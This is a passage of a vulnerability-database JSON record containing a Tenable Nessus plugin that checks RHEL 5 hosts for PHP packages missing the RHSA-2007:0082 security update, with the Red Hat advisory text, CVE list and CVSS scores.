reference:\"php-snmp-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:23:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-01-16T20:07:19", "references": [{"idList": ["CESA-2007:0081-01", "CESA-2007:0076", "CESA-2007:0154-01"], "type": "centos"}, {"idList": ["ELSA-2007-0076", "ELSA-2007-0348"], "type": "oraclelinux"}, {"idList": ["GLSA-200703-21"], "type": "gentoo"}, {"idList": ["EDB-ID:29807", "EDB-ID:3572", "EDB-ID:29692", "EDB-ID:3413"], "type": "exploitdb"}, {"idList": ["RHSA-2007:0076", "RHSA-2007:0081", "RHSA-2007:0082", "RHSA-2007:0154", "RHSA-2007:0088"], "type": "redhat"}, {"idList": ["SUSE-SA:2007:044", "SUSE-SA:2007:020"], "type": "suse"}, {"idList": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "type": "cve"}, {"idList": ["SECURITYVULNS:VULN:7248", "SECURITYVULNS:VULN:7473", "SECURITYVULNS:VULN:7547", "SECURITYVULNS:VULN:7279", "SECURITYVULNS:VULN:7355"], "type": "securityvulns"}, {"idList": ["SSA-2007-053-01"], "type": "slackware"}, {"idList": ["REDHAT-RHSA-2007-0076.NASL", "MANDRAKE_MDKSA-2007-048.NASL", "REDHAT-RHSA-2007-0081.NASL", "DEBIAN_DSA-1264.NASL", "UBUNTU_USN-424-2.NASL", "SLACKWARE_SSA_2007-053-01.NASL", "CENTOS_RHSA-2007-0076.NASL", "UBUNTU_USN-424-1.NASL", "FREEBSD_PKG_7FCF1727BE7111DBB2EC000C6EC775D9.NASL", "ORACLELINUX_ELSA-2007-0076.NASL"], "type": "nessus"}, {"idList": ["OSVDB:32765", "OSVDB:34712", "OSVDB:34714", "OSVDB:34711", "OSVDB:32767", "OSVDB:34707", "OSVDB:33957", "OSVDB:32763", "OSVDB:32764", "OSVDB:32766"], "type": "osvdb"}, {"idList": ["USN-424-2", "USN-424-1"], "type": "ubuntu"}, {"idList": ["OPENVAS:861271", "OPENVAS:58066", "OPENVAS:58119", "OPENVAS:840188", "OPENVAS:861324", "OPENVAS:1361412562310100606", "OPENVAS:840061", "OPENVAS:136141256231058066", "OPENVAS:1361412562310830326", "OPENVAS:830326"], "type": "openvas"}, {"idList": ["DEBIAN:DSA-1264-1:CBFFE"], "type": "debian"}, {"idList": ["7FCF1727-BE71-11DB-B2EC-000C6EC775D9"], "type": "freebsd"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "324fb4ab4b9df87bf70dd9165fd8dcb7e37c7b69aa1b8827657d53f945ff6cfb", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "350b87797b39b224a4879af085aa2c91", "key": "references"}, {"hash": "0e4da7304285381f16759537beaada44", "key": "modified"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "f9041746dbcce3f84075f79d2214ad38", "key": "description"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "235ef73aacd3c98bd8a26e36742ff4ae", "key": "cpe"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "16ae60f65e15ed9cdc48cbd74258f565", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2019-01-16T20:07:19", "modified": "2019-01-02T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://access.redhat.com/security/cve/cve-2007-1285", "https://access.redhat.com/security/cve/cve-2007-1701", "https://access.redhat.com/security/cve/cve-2007-0910", "https://access.redhat.com/errata/RHSA-2007:0082", "https://access.redhat.com/security/cve/cve-2007-0988", "https://access.redhat.com/security/cve/cve-2007-0909", "https://access.redhat.com/security/cve/cve-2007-1825", "https://access.redhat.com/security/cve/cve-2007-0906", "https://access.redhat.com/security/cve/cve-2007-0907", "https://access.redhat.com/security/cve/cve-2007-1380", "https://access.redhat.com/security/cve/cve-2007-0908"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["description"], "edition": 9, "lastseen": "2019-01-16T20:07:19"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-ncurses", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-gd"], "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4ede82250a996e6cea28deac38f82f65056049fe22df73d7a61d7380fb187122", "hashmap": [{"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a29e0c952ea4d93d5908b4afdfab89", "key": "sourceData"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "2ab893896877901f3ca480db3bed6e02", "key": "references"}, {"hash": "851dbb0f33630b51c53f0d6ca1a06fc3", "key": "modified"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, 